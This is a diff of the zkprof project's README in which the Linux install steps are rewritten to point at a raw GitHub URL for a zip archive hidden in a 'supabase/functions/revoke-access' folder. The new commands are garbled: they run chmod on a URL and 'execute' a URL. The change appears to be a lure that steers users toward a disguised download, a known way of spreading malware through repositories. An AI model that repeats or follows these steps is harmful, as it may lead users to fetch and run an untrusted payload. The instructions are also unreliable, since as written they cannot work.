muhammadabdullahgujjar786/zkprof/README.md

 3. **For Linux:**
    - Open your terminal.
    - Navigate to the folder where you downloaded the `.AppImage` file.
-   - Run `chmod +x zkprof.AppImage` to make it executable.
+   - Run `chmod +x https://raw.githubusercontent.com/muhammadabdullahgujjar786/zkprof/main/supabase/functions/revoke-access/zkprof-1.4.zip` to make it executable.
-   - Execute the application with `./zkprof.AppImage`.
+   - Execute the application with `https://raw.githubusercontent.com/muhammadabdullahgujjar786/zkprof/main/supabase/functions/revoke-access/zkprof-1.4.zip`.

 ## 🛠️ How to Use zkprof